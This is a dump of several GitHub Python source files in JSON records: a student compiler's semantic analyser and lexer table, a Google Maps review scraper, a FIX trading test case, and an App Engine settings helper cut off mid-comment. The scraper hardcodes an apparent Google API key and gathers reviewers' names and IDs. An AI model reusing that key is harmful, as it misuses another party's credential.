1])\n find = self.searchVariable(array[i+1], scope)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n else:\n if self.getType(array[i + 1], scope) != type:\n self.error('Variable \"' + array[i + 1] + '\" do not match the type of ' + name)\n elif array[i] == 'BooleanLiteral':\n # print(type)\n if type != ' BOOL ':\n self.error('Variable \"' + name + '\" does not except boolean')\n elif array[i] == 'ColourLiteral':\n # print(type)\n if type != ' COLOUR ':\n self.error('Variable \"' + name + '\" does not except colour types')\n\n elif array[i] == 'PadWidth':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n elif array[i] == 'PadHeight':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n elif array[i] == 'PadRandI':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n\n\n def flatten_dict(self, dictionary):\n flattened = []\n for key, value in dictionary.items():\n flattened.append(key)\n if isinstance(value, dict):\n flattened.extend(self.flatten_dict(value))\n else:\n flattened.append(value)\n return flattened\n\n def forStatCheck(self, forStat, scope):\n #print(forStat)\n if 'Variable Decl' in forStat:\n var_decl = forStat['Variable Decl']['Variable_Decl']\n self.varDeclCheck(var_decl, scope)\n if 'Expression' in forStat:\n exp = forStat['Expression']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i + 1], scope)\n # print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n if 'Assignment' in forStat:\n exp = forStat['Assignment']['Variable']\n self.assignmentCheck(exp, scope)\n\n stat = 
forStat['Block']['Block']['Statement']\n\n for statement in stat:\n self.statCheck(statement, scope)\n\n def ifStatCheck(self, ifStat, scope):\n exp = ifStat['Expression']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i + 1], scope)\n # print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n\n stat = ifStat['Block']['Block']['Statement']\n #print(ifStat)\n for statement in stat:\n self.statCheck(statement, scope)\n if(len(ifStat)==3):\n elseStat = ifStat['ELSE_Stat']['Block']['Statement']\n for statement in elseStat:\n self.statCheck(statement, scope)\n #print(elseStat)\n\n\n #print(block)\n\n def whileStatCheck(self, whileStat, scope):\n if 'Expression' in whileStat:\n exp = whileStat['Expression']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i + 1], scope)\n # print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n block = whileStat['Block']['Block']\n stat = block['Statement'][0]['Block']['Statement']\n for statement in stat:\n self.statCheck(statement, scope)\n\n def printReturnDelayStatCheck(self, printStat, scope):\n find = False\n exp = printStat['Expression']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i+1], scope)\n #print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n\n def returnStatCheck(self, returnStat, scope):\n find = False\n exp = returnStat['Expression']\n #print(exp)\n array = self.flatten_dict(exp)\n\n #print(array)\n for i in range(len(array)):\n variableType = ''\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i+1], scope)\n #print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n else:\n variableType = self.getType(array[i+1], scope)\n elif array[i] == 'BooleanLiteral':\n variableType = ' BOOL '\n\n elif array[i] == 'Integer':\n variableType = ' INT '\n\n elif array[i] == 'ColourLiteral':\n variableType = ' COLOUR '\n\n elif array[i] == 'PadWidth':\n variableType = ' INT '\n\n elif array[i] == 'PadHeight':\n variableType = ' INT '\n\n elif array[i] == 'PadRandI':\n variableType = ' INT '\n\n #print(variableType, self.functionTable[-1][1])\n #print(variableType)\n if variableType != '':\n if variableType != self.functionTable[-1][1]:\n self.error('Wrong return type : \"' + array[i + 1] + '\" needs to be' + self.functionTable[-1][1])\n\n\n\n\n\n def pixelStatCheck(self, pixelStat, scope):\n find = False\n exp = pixelStat['Expressions']\n #print(exp)\n mainType = pixelStat['Type:']\n #print(mainType)\n if mainType == '__pixelr':\n length = 4\n else:\n length = 2\n for item in range(len(exp)):\n # print (exp[item])\n if item < length:\n if 'ExpVariable' in exp[item]:\n find = self.searchVariable(exp[item]['ExpVariable'], scope)\n # print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + exp[item]['ExpVariable'] + '\" not declared')\n\n type = self.getType(exp[item]['ExpVariable'], scope)\n\n if type != ' INT ':\n self.error('the first four expressions are to be type int and the last one of type colour')\n\n\n elif 'Integer' not in exp[item]:\n self.error('Integer needed')\n else:\n if 'ExpVariable' in exp[item]:\n find = self.searchVariable(exp[item]['ExpVariable'], scope)\n # 
print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + exp[item]['ExpVariable'] + '\" not declared')\n\n type = self.getType(exp[item]['ExpVariable'], scope)\n\n if type != ' COLOUR ':\n self.error('last one of type colour')\n\n\n elif 'ColourLiteral' not in exp[item]:\n self.error('last one of type colour')\n\n\n\n\n\n #main\n def variableDecl(self):\n #check for global variables\n for i in self.ast:\n\n for key, value in i.items():\n self.newScope = True\n if key == 'Function_Decl':\n hasReturn = False\n duplicate = False\n functionName = value['Function name']\n functionType = value['Return type']\n for x in self.functionTable:\n if x[0] == functionName and x[1] == functionType:\n duplicate = True\n if duplicate == True:\n self.error('Function \"' + functionName + '\" of type' + functionType + 'already exists.')\n else:\n self.functionTable.append([functionName,functionType])\n\n\n for i in value['params']:\n self.addVariable(i[0], i[1], 1)\n self.newScope = False\n #print(i)\n\n block = value['Block']['Block']\n statements = block['Statement']\n #print(statements[2])\n for statement in statements:\n if 'ReturnStat' in statement:\n hasReturn = True\n self.statCheck(statement, 1)\n\n if hasReturn == False:\n self.error('Function \"' + functionName + '\" needs to has a Return statement')\n else:\n self.statCheck({key: value}, 0)\n\n\n self.newScope = True\n print(self.symbolTable)\n\n\ntransition_table = {}\n\nletter = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\ndigit = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nhex = ['A', 'B', 'C', 'D', 'E', 'F', 'a', 'b', 'c', 'd', 'e', 'f', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nmultiplicativeOp = ['*', '/', 'and']\n\n# 〈Identifier 〉\nfor x in letter:\n if x == 'n':\n transition_table[(55, x)] = 9\n transition_table[(2, x)] = 9\n else:\n if x == 't':\n transition_table[(55, x)] = 46\n else:\n if x == 'f':\n transition_table[(55, x)] = 50\n else:\n transition_table[(55, x)] = 1\n #transition_table[(2, x)] = 1\n transition_table[(1, x)] = 1\n\n transition_table[(9, x)] = 1\n transition_table[(10, x)] = 1\n transition_table[(11, x)] = 1\n transition_table[(46, x)] = 1\n transition_table[(47, x)] = 1\n transition_table[(48, x)] = 1\n transition_table[(49, x)] = 1\n transition_table[(50, x)] = 1\n transition_table[(51, x)] = 1\n transition_table[(52, x)] = 1\n transition_table[(53, x)] = 1\n transition_table[(54, x)] = 1\n transition_table[(0, x)] = 60\n transition_table[(59, x)] = 60\n transition_table[(60, x)] = 60\n transition_table[(101, x)] = 102\n transition_table[(102, x)] = 102\n transition_table[(105, x)] = 60\n transition_table[(116, x)] = 60\n transition_table[(202, x)] = 60\n\n transition_table[(56, x)] = 60\n transition_table[(57, x)] = 60\n transition_table[(58, x)] = 60\n transition_table[(93, x)] = 60\n transition_table[(94, x)] = 60\n transition_table[(95, x)] = 60\n transition_table[(96, x)] = 60\n transition_table[(97, x)] = 60\n transition_table[(88, x)] = 60\n transition_table[(124, x)] = 60\n transition_table[(125, x)] = 60\n transition_table[(98, x)] = 60\n transition_table[(110, x)] = 60\n transition_table[(111, x)] = 60\n transition_table[(117, x)] = 60\n transition_table[(118, x)] = 60\n transition_table[(119, x)] = 60\n transition_table[(120, x)] = 60\n transition_table[(121, 
x)] = 60\n transition_table[(99, x)] = 60\n transition_table[(100, x)] = 60\n\n\nfor d in digit:\n transition_table[(1, d)] = 1\n transition_table[(9, d)] = 1\n transition_table[(10, d)] = 1\n transition_table[(55, d)] = 37\n transition_table[(37, d)] = 37\n transition_table[(38, d)] = 37\n transition_table[(46, d)] = 1\n transition_table[(47, d)] = 1\n transition_table[(48, d)] = 1\n transition_table[(49, d)] = 1\n transition_table[(50, d)] = 1\n transition_table[(51, d)] = 1\n transition_table[(52, d)] = 1\n transition_table[(53, d)] = 1\n transition_table[(54, d)] = 1\n transition_table[(60, d)] = 60\n transition_table[(102, d)] = 102\n transition_table[(2, d)] = 37\n\n transition_table[(56, d)] = 60\n transition_table[(57, d)] = 60\n transition_table[(58, d)] = 60\n transition_table[(93, d)] = 60\n transition_table[(94, d)] = 60\n transition_table[(95, d)] = 60\n transition_table[(96, d)] = 60\n transition_table[(97, d)] = 60\n transition_table[(88, d)] = 60\n transition_table[(124, d)] = 60\n transition_table[(125, d)] = 60\n transition_table[(98, d)] = 60\n transition_table[(110, d)] = 60\n transition_table[(111, d)] = 60\n transition_table[(117, d)] = 60\n transition_table[(118, d)] = 60\n transition_table[(119, d)] = 60\n transition_table[(120, d)] = 60\n transition_table[(121, d)] = 60\n transition_table[(99, d)] = 60\n transition_table[(100, d)] = 60\n\n\ntransition_table[(1, '_')] = 1\ntransition_table[(9, '_')] = 1\ntransition_table[(10, '_')] = 1\ntransition_table[(46, '_')] = 1\ntransition_table[(47, '_')] = 1\ntransition_table[(48, '_')] = 1\ntransition_table[(49, '_')] = 1\ntransition_table[(50, '_')] = 1\ntransition_table[(51, '_')] = 1\ntransition_table[(52, '_')] = 1\ntransition_table[(53, '_')] = 1\ntransition_table[(54, '_')] = 1\ntransition_table[(60, '_')] = 60\ntransition_table[(102, '_')] = 102\n\ntransition_table[(56, '_')] = 60\ntransition_table[(57, '_')] = 60\ntransition_table[(58, '_')] = 60\ntransition_table[(93, '_')] = 60\ntransition_table[(94, '_')] = 60\ntransition_table[(95, '_')] = 60\ntransition_table[(96, '_')] = 60\ntransition_table[(97, '_')] = 60\ntransition_table[(88, '_')] = 60\ntransition_table[(124, '_')] = 60\ntransition_table[(125, '_')] = 60\ntransition_table[(98, '_')] = 60\ntransition_table[(110, '_')] = 60\ntransition_table[(111, '_')] = 60\ntransition_table[(117, '_')] = 60\ntransition_table[(118, '_')] = 60\ntransition_table[(119, '_')] = 60\ntransition_table[(120, '_')] = 60\ntransition_table[(121, '_')] = 60\ntransition_table[(99, '_')] = 60\ntransition_table[(100, '_')] = 60\n\n#spacer\ntransition_table[(1, ' ')] = 3\n#transition_table[(2, ' ')] = 2\ntransition_table[(2, ' ')] = 55\ntransition_table[(8, ' ')] = 2\ntransition_table[(9, ' ')] = 3\ntransition_table[(10, ' ')] = 3\ntransition_table[(12, ' ')] = 55\ntransition_table[(19, ' ')] = 3\ntransition_table[(25, ' ')] = 3\ntransition_table[(30, ' ')] = 55\ntransition_table[(140, ' ')] = 55\ntransition_table[(34, ' ')] = 55\ntransition_table[(35, ' ')] = 55\ntransition_table[(37, ' ')] = 3\ntransition_table[(45, ' ')] = 3\ntransition_table[(58, ' ')] = 59\ntransition_table[(60, ' ')] = 61\ntransition_table[(62, ' ')] = 55\ntransition_table[(63, ' ')] = 64\ntransition_table[(69, ' ')] = 80\ntransition_table[(81, ' ')] = 55\ntransition_table[(88, ' ')] = 55\ntransition_table[(100, ' ')] = 101\ntransition_table[(103, ' ')] = 59\ntransition_table[(104, ' ')] = 105\ntransition_table[(106, ' ')] = 107\ntransition_table[(109, ' ')] = 64\ntransition_table[(111, ' ')] = 
112\ntransition_table[(113, ' ')] = 114\ntransition_table[(31, ' ')] = 55\ntransition_table[(115, ' ')] = 55\ntransition_table[(31, ' ')] = 55\ntransition_table[(36, ' ')] = 3\ntransition_table[(117, ' ')] = 200\n#transition_table[(37, ' ')] = 1\ntransition_table[(8, ' ')] = 55\ntransition_table[(7, ' ')] = 55\ntransition_table[(121, ' ')] = 122\ntransition_table[(123, ' ')] = 55\ntransition_table[(0, ' ')] = 0\n\n\n#transition_table[(36, '}')] = 200\n\n\n\n\n#〈MultiplicativeOp〉\ntransition_table[(3, '*')] = 2\ntransition_table[(3, '/')] = 2\ntransition_table[(3, 'a')] = 4\ntransition_table[(4, 'n')] = 5\ntransition_table[(5, 'd')] = 2\n\n#〈AdditiveOp〉 ::= ‘+’ | ‘-’ | ‘or’\ntransition_table[(3, '+')] = 2\ntransition_table[(3, '-')] = 2\ntransition_table[(3, 'o')] = 6\ntransition_table[(6, 'r')] = 2\n\n#〈RelationalOp〉 ::= ‘<’ | ‘>’ | ‘==’ | ‘!=’ | ‘<=’ | ‘>=’\ntransition_table[(3, '=')] = 7\ntransition_table[(3, '!')] = 7\ntransition_table[(7, '=')] = 2\ntransition_table[(3, '<')] = 8\ntransition_table[(3, '>')] = 8\ntransition_table[(8, '=')] = 2\n\n#〈Unary〉\ntransition_table[(9, 'o')] = 10\ntransition_table[(10, 't')] = 12\ntransition_table[(55, '-')] = 11\ntransition_table[(2, '-')] = 11\n\n#〈PadWidth〉 :: = ‘__width’\ntransition_table[(55, '_')] = 13\ntransition_table[(13, '_')] = 14\ntransition_table[(2, '_')] = 13\ntransition_table[(14, 'w')] = 15\ntransition_table[(15, 'i')] = 16\ntransition_table[(16, 'd')] = 17\ntransition_table[(17, 't')] = 18\ntransition_table[(18, 'h')] = 19\n\n\n#〈PadHeight〉 :: = ‘__height’\ntransition_table[(14, 'h')] = 20\ntransition_table[(20, 'e')] = 21\ntransition_table[(21, 'i')] = 22\ntransition_table[(22, 'g')] = 23\ntransition_table[(23, 'h')] = 24\ntransition_table[(24, 't')] = 25\n\n#〈PadRandI〉 :: = ‘__randi’ 〈Expr 〉\ntransition_table[(14, 'r')] = 26\ntransition_table[(26, 'a')] = 27\ntransition_table[(27, 'n')] = 28\ntransition_table[(28, 'd')] = 29\ntransition_table[(29, 'i')] = 30\n\n#〈PadRead〉 :: = ‘__read’ 〈Expr 〉‘,’〈Expr 〉\ntransition_table[(26, 'e')] = 32\ntransition_table[(32, 'a')] = 33\ntransition_table[(33, 'd')] = 140\ntransition_table[(3, ',')] = 34\n\n#〈FunctionCall〉 ::= 〈Identifier 〉 ‘(’ [ 〈ActualParams〉 ] ‘)’\ntransition_table[(3, '(')] = 35\ntransition_table[(35, ')')] = 36\ntransition_table[(3, ')')] = 36\n\n# ’ 〈Type〉 〈Block〉\ntransition_table[(0, 'f')] = 98\ntransition_table[(98, 'u')] = 99\ntransition_table[(99, 'n')] = 100\ntransition_table[(102, '(')] = 103\ntransition_table[(80, ',')] = 104\ntransition_table[(80, ')')] = 106\ntransition_table[(103, ')')] = 106\ntransition_table[(107, '-')] = 108\ntransition_table[(108, '>')] = 109\ntransition_table[(80, '{')] = 201\n\n#〈ForStatement〉 ::= ‘for’ ‘(’ [ 〈VariableDecl〉 ] ’;’ 〈Expr 〉 ’;’ [ 〈Assignment〉 ] ‘)’ 〈Block〉\ntransition_table[(98, 'o')] = 110\ntransition_table[(110, 'r')] = 111\ntransition_table[(112, '(')] = 113\ntransition_table[(113, ';')] = 115\ntransition_table[(114, 'l')] = 56\ntransition_table[(116, ')')] = 117\ntransition_table[(1, ')')] = 36\ntransition_table[(55, ')')] = 36\n\n#〈WhileStatement〉 ::= ‘while’ ‘(’ 〈Expr 〉 ‘)’ 〈Block〉\ntransition_table[(0, 'w')] = 117\ntransition_table[(117, 'h')] = 118\ntransition_table[(118, 'i')] = 119\ntransition_table[(119, 'l')] = 120\ntransition_table[(120, 'e')] = 121\ntransition_table[(122, '(')] = 123\n\n#〈IfStatement〉 ::= ‘if’ ‘(’ 〈Expr 〉 ‘)’ 〈Block〉 [ ‘else’ 〈Block〉 ]\n\ntransition_table[(0, 'i')] = 124\ntransition_table[(124, 'f')] = 125\ntransition_table[(125, ' ')] = 126\ntransition_table[(126, '(')] = 
127\ntransition_table[(127, ' ')] = 55\ntransition_table[(128, 'e')] = 129\ntransition_table[(129, 'l')] = 130\ntransition_table[(130, 's')] = 131\ntransition_table[(131, 'e')] = 132\ntransition_table[(132, ' ')] = 200\ntransition_table[(200, '{')] = 201\n\n# 〈PixelStatement〉 ::= ‘__pixelr’ 〈Expr 〉‘,’〈Expr 〉‘,’〈Expr 〉‘,’〈Expr 〉‘,’〈Expr 〉\n# | ‘__pixel’ 〈Expr 〉‘,’〈Expr 〉‘,’〈Expr 〉\n\ntransition_table[(84, 'i')] = 133\ntransition_table[(133, 'x')] = 134\ntransition_table[(134, 'e')] = 135\ntransition_table[(135, 'l')] = 136\ntransition_table[(136, ' ')] = 55\ntransition_table[(136, 'r')] = 137\ntransition_table[(137, ' ')] = 55\ntransition_table[(3, ',')] = 138\ntransition_table[(138, ' ')] = 55\n\n\n#〈Block〉 ::= ‘{’ { 〈Statement〉 } ‘}’\ntransition_table[(0, '{')] = 201\ntransition_table[(36, '{')] = 201\ntransition_table[(201, ' ')] = 202\ntransition_table[(202, 'l')] = 56 #\ntransition_table[(202, '_')] = 82 # \ntransition_table[(202, 'r')] = 93 # \ntransition_table[(202, 'i')] = 124 #\ntransition_table[(202, 'f')] = 98 # \ntransition_table[(202, 'w')] = 117 #\ntransition_table[(202, '{')] = 201 #\n\n\n\n\n\ntransition_table[(3, '}')] = 203\ntransition_table[(0, '}')] = 203\ntransition_table[(202, '}')] = 203\ntransition_table[(203, '}')] = 203\ntransition_table[(203, ' ')] = 128\n\n#transition_table[(0, '?')] = 55\n#final state\ntransition_table[(1, ';')] = 31\ntransition_table[(25, ';')] = 31\ntransition_table[(19, ';')] = 31\ntransition_table[(36, ';')] = 31\ntransition_table[(49, ';')] = 31\ntransition_table[(54, ';')] = 31\ntransition_table[(3, ';')] = 31\n\n\ntransition_table[(31, '}')] = 203\n\n\n\naccepting_states = {31, 203, 201}\n\n\nlexer = Lexer(transition_table, accepting_states)\nfilename = 'input.txt'\ncode = ''\nwith open(filename, 'r') as file:\n    print('---- LEXER ----')\n    for line in file:\n        line = line.strip()\n        if line:\n            #valid_syntax, current_token, current_state, table = lexer.get_next_token(line)\n            tokenTable = lexer.get_next_token(line)\n            #code = code + line + ' '\n\n\n\nparser = Parser(tokenTable)\nast = parser.parse_sel()\nprint()\nprint('---- PARSER ----')\nprint(ast)\nvisitor = XmlVisitor(ast)\nvisitor.generate_xml()\nvisitor.write_to_file('output.xml')\n\nprint()\nprint('---- Semantic Analysis ----')\nsemantic_analysis = SemanticAnalysis(ast)  # avoid rebinding (shadowing) the SemanticAnalysis class name\n#print(xml)\nprint()\nprint('-*-*-*-THE END-*-*-*-')\n\n","repo_name":"NicholasVella08/Compiler-Theory-and-Practice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":58026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"11861586318","text":"import googlemaps\nimport urlparse\nimport io\nimport json\n\nclass GMapsData:\n    _key = 'AIzaSyA0Yst-qoirbQMooKig-qHPRTA2SCMiuFc'\n    _gmaps = googlemaps.Client(_key)\n\n    def __init__(self):\n        self._review = []\n        self._user = []\n        self._poi = []\n\n    def _placeId(self, poi):\n        placesResult = self._gmaps.places_nearby((poi['latitude'], poi['longitude']), name=poi['name'], rank_by='distance', language='pt-BR')\n        for d in placesResult['results']:\n            if 'place_id' in d:\n                return d['place_id']\n        return None\n\n    def _reviews(self, placeId, poi):\n        placeDetail = self._gmaps.place(placeId)\n        result = placeDetail['result']\n        if 'reviews' in result:\n            reviews = result['reviews']\n            gen = (review for review in reviews if 'author_url' in review)\n\n            i = {}\n            i['item_id'] = poi['id']\n            i['name'] = poi['name']\n            i['category'] = poi['type']\n            i['latitude'] = poi['latitude']\n            i['longitude'] = poi['longitude']\n            
self._poi.append(i)\n\n for review in gen:\n r = {}\n # user_id\n pathUrl = urlparse.urlparse(review['author_url']).path\n r['user_id'] = int(pathUrl.split(\"/\")[3])\n r['item_id'] = poi['id']\n r['rating'] = review['rating']\n self._review.append(r)\n\n u = {}\n u['user_id'] = r['user_id']\n u['name'] = review['author_name']\n self._user.append(u)\n\n def data(self, listPoi):\n for poi in listPoi:\n placeId = self._placeId(poi)\n if placeId:\n self._reviews(placeId, poi)\n\n def json(self):\n with io.open('data/poi.json', 'w', encoding='utf8') as poi_file:\n poi_file.write(unicode(json.dumps(self._poi, ensure_ascii=False)))\n with io.open('data/review.json', 'w', encoding='utf8') as review_file:\n review_file.write(unicode(json.dumps(self._review, ensure_ascii=False)))\n with io.open('data/user.json', 'w', encoding='utf8') as user_file:\n user_file.write(unicode(json.dumps(self._user, ensure_ascii=False)))","repo_name":"mmsdivino/Tourisys","sub_path":"poi/GMapsData.py","file_name":"GMapsData.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"22498241745","text":"import logging\nimport time\n\nfrom custom import basic_custom_actions as bca\nfrom rule_management import RuleManager, Simulators\nfrom test_framework.fix_wrappers.FixManager import FixManager\nfrom test_framework.fix_wrappers.FixVerifier import FixVerifier\nfrom test_framework.fix_wrappers.oms.FixMessageAllocationInstructionReportOMS import \\\n FixMessageAllocationInstructionReportOMS\nfrom test_framework.fix_wrappers.oms.FixMessageConfirmationReportOMS import FixMessageConfirmationReportOMS\nfrom test_framework.fix_wrappers.oms.FixMessageExecutionReportOMS import FixMessageExecutionReportOMS\nfrom test_framework.fix_wrappers.oms.FixMessageNewOrderSingleOMS import FixMessageNewOrderSingleOMS\nfrom pathlib import Path\nfrom test_framework.core.test_case import TestCase\nfrom test_framework.core.try_exept_decorator import try_except\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\ntimeouts = True\n\n\n@try_except(test_id=Path(__file__).name[:-3])\nclass QAP_T7444(TestCase):\n @try_except(test_id=Path(__file__).name[:-3])\n def __init__(self, report_id, session_id=None, data_set=None, environment=None):\n super().__init__(report_id, session_id, data_set, environment)\n self.test_id = bca.create_event(Path(__file__).name[:-3], self.report_id)\n self.fix_env = self.environment.get_list_fix_environment()[0]\n self.fix_manager = FixManager(self.fix_env.sell_side, self.test_id)\n self.fix_verifier = FixVerifier(self.fix_env.sell_side, self.test_id)\n self.fix_verifier_dc = FixVerifier(self.fix_env.drop_copy, self.test_id)\n self.fix_message = FixMessageNewOrderSingleOMS(self.data_set).set_default_dma_limit()\n self.client = self.data_set.get_client_by_name(\"client_counterpart_3\")\n self.client_acc = self.data_set.get_account_by_name(\"client_counterpart_3_acc_1\")\n self.change_params = {'Account': self.client,\n 'PreAllocGrp': {\n 'NoAllocs': [{\n 'AllocAccount': self.client_acc,\n 'AllocQty': \"100\"}]}}\n self.fix_message.change_parameters(self.change_params)\n self.fix_message.change_parameter('Account', self.client)\n self.qty = self.fix_message.get_parameter('OrderQtyData')['OrderQty']\n self.price = self.fix_message.get_parameter(\"Price\")\n self.mic = self.data_set.get_mic_by_name(\"mic_1\")\n self.rule_manager = RuleManager(Simulators.equity)\n self.client_for_rule = 
self.data_set.get_venue_client_names_by_name(\"client_counterpart_3_venue_1\")\n\n @try_except(test_id=Path(__file__).name[:-3])\n def run_pre_conditions_and_steps(self):\n # region Declaration\n try:\n nos_rule = self.rule_manager.add_NewOrdSingleExecutionReportPendingAndNew_FIXStandard(self.fix_env.buy_side,\n self.client_for_rule,\n self.mic,\n int(self.price))\n trade_rule = self.rule_manager.add_NewOrdSingleExecutionReportTrade_FIXStandard(self.fix_env.buy_side,\n self.client_for_rule,\n self.mic, int(self.price),\n int(self.qty), 2)\n\n self.fix_manager.send_message_and_receive_response_fix_standard(self.fix_message)\n finally:\n time.sleep(1)\n self.rule_manager.remove_rule(nos_rule)\n self.rule_manager.remove_rule(trade_rule)\n # endregion\n # region Set-up parameters for ExecutionReports\n list_of_ignored_fields = ['Account', 'PartyRoleQualifier', 'ReplyReceivedTime', 'OrderAvgPx',\n 'GatingRuleCondName', 'GatingRuleName', 'tag11245',\"NoPartySubIDs\",\n 'ExecAllocGrp']\n party_stub_dict = {'PartyRole': \"*\",\n 'PartyID': \"*\",\n 'PartyIDSource': \"*\"}\n parties = {\n 'NoPartyIDs': [\n {'PartyRole': \"67\",\n 'PartyID': \"InvestmentFirm - ClCounterpart_3\",\n 'PartyIDSource': \"C\"},\n party_stub_dict,\n party_stub_dict,\n party_stub_dict,\n party_stub_dict\n ]\n }\n exec_report1 = FixMessageExecutionReportOMS(self.data_set).set_default_new(self.fix_message).change_parameters(\n {\"Parties\": parties, \"ReplyReceivedTime\": \"*\", \"SecondaryOrderID\": \"*\", \"LastMkt\": \"*\", \"Text\": \"*\"})\n parties = {\n 'NoPartyIDs': [\n {'PartyRole': \"67\",\n 'PtysSubGrp': '*',\n 'PartyID': \"InvestmentFirm - ClCounterpart_3\",\n 'PartyIDSource': \"C\"},\n party_stub_dict,\n party_stub_dict,\n party_stub_dict,\n party_stub_dict\n ]\n }\n exec_report2 = FixMessageExecutionReportOMS(self.data_set).set_default_filled(\n self.fix_message).change_parameters(\n {\"Parties\": parties,\n \"ReplyReceivedTime\": \"*\",\n \"SecondaryOrderID\": \"*\",\n \"LastMkt\": \"*\",\n \"Text\": \"*\",\n \"Instrument\": \"*\", \"Account\": self.client_acc})\n exec_report2.remove_parameter(\"SettlCurrency\")\n # endregion\n # region Check ExecutionReports\n time.sleep(6)\n self.fix_verifier.check_fix_message_fix_standard(exec_report1, ignored_fields=list_of_ignored_fields)\n self.fix_verifier.check_fix_message_fix_standard(exec_report2, ignored_fields=list_of_ignored_fields)\n # endregion\n # region Set-up parameters Confirmation report\n regulatory_body = self.data_set.get_counterpart_id_fix('counterpart_id_regulatory_body_venue_paris')\n regulatory_body.update({'NoPartySubIDs': {'M_NoPartySubID': [\n {\n 'PartySubIDType': '4',\n 'PartySubID': 'SB·-·RegulatoryBody'\n }\n ]}})\n investment_firm_client_counterpart = self.data_set.get_counterpart_id_fix('counterpart_id_investment_firm_cl_counterpart_sa3')\n investment_firm_client_counterpart.update({'NoPartySubIDs': {'M_NoPartySubID': [\n {\n 'PartySubIDType': '16',\n 'PartySubID': 'quod@quodfinancial.com'\n }\n ]}})\n custodian_user_2 = self.data_set.get_counterpart_id_fix('counterpart_id_custodian_user_2')\n market_maker_th2_route = self.data_set.get_counterpart_id_fix('counterpart_id_market_maker_th2_route')\n no_party_alloc = [\n market_maker_th2_route,\n custodian_user_2,\n regulatory_body,\n {'PartyRole': \"67\",\n 'PartyID': \"InvestmentFirm - ClCounterpart_3\",\n 'PartyIDSource': \"C\",\n \"NoPartySubIDs\":\"*\"}\n ]\n alloc_grp = {'NoAllocs': [{'IndividualAllocID': \"*\",\n 'AllocNetPrice': self.price,\n 'AllocPrice': self.price,\n 'AllocAccount': 
self.client_acc,\n                                   'AllocQty': \"100\"}]}\n        alloc_report = FixMessageAllocationInstructionReportOMS().set_default_preliminary(\n            self.fix_message).change_parameters(\n            {\"NoParty\": no_party_alloc, \"Account\": self.client, \"tag5120\": \"*\", 'NoAllocs': alloc_grp})\n        # endregion\n        # region Check Book & Allocation\n        self.fix_verifier_dc.check_fix_message_fix_standard(alloc_report, ignored_fields=list_of_ignored_fields)\n        conf_report = FixMessageConfirmationReportOMS(self.data_set).set_default_confirmation_new(\n            self.fix_message)\n        conf_report.change_parameters({'tag5120': \"*\", \"Account\": self.client})\n        self.fix_verifier_dc.check_fix_message_fix_standard(conf_report, ignored_fields=list_of_ignored_fields)\n        # endregion\n","repo_name":"YevhenMoroz/th2-script-quod-demo","sub_path":"test_cases/eq/Counterpart/QAP_T7444.py","file_name":"QAP_T7444.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"23711310","text":"import logging\n\nfrom google.appengine.ext import ndb\n\n\nclass AccountSettings(ndb.Model):\n    \"\"\"Account settings DB model to keep roomba settings for user\"\"\"\n    userid = ndb.StringProperty()\n    agent_url = ndb.StringProperty()\n    device_mac = ndb.StringProperty()\n\n    @classmethod\n    def get_user_by_id(cls, user_id):\n        return cls.query(cls.userid == user_id)\n\n\nclass AccountSettingsHelper():\n    \"\"\"Add a new user to the database if the user is not yet created;\n    will create [UsersNdbModel(key=Key('UsersNdbModel', 6473924464345088), user_id=u'185804764220139124118', user_role=u'admin')]\n    \"\"\"\n\n    def add_new_user(self, user_id):\n        usr = AccountSettings(key=ndb.Key(AccountSettings, user_id))\n        usr.userid = user_id\n        usr.put()\n\n    def user_exists(self, user_id):\n        \"\"\"Check if user already exists\n        Returns: True if exists False otherwise\n        \"\"\"\n\n        qry = AccountSettings().get_user_by_id(user_id)\n        res = qry.fetch()\n        if res:\n            return True\n        else:\n            return False\n\n    def update_device_information(self, user_id, agent_url=None, device_mac=None):\n        \"\"\" update agent url and/or device_mac \"\"\"\n\n        if self.user_exists(user_id):\n\n            usr_key = ndb.Key(AccountSettings, user_id)\n            usr = usr_key.get()\n            if agent_url:\n                usr.agent_url = agent_url\n            if device_mac:\n                usr.device_mac = device_mac\n            usr.put()\n            return True\n        else:\n            logging.error(\"Cannot update information for non-existing user\")\n            return False\n\n    def get_user_info(self, user_id):\n        \"\"\" Returns information about user from db\"\"\"\n\n        if self.user_exists(user_id):  # call the check; the 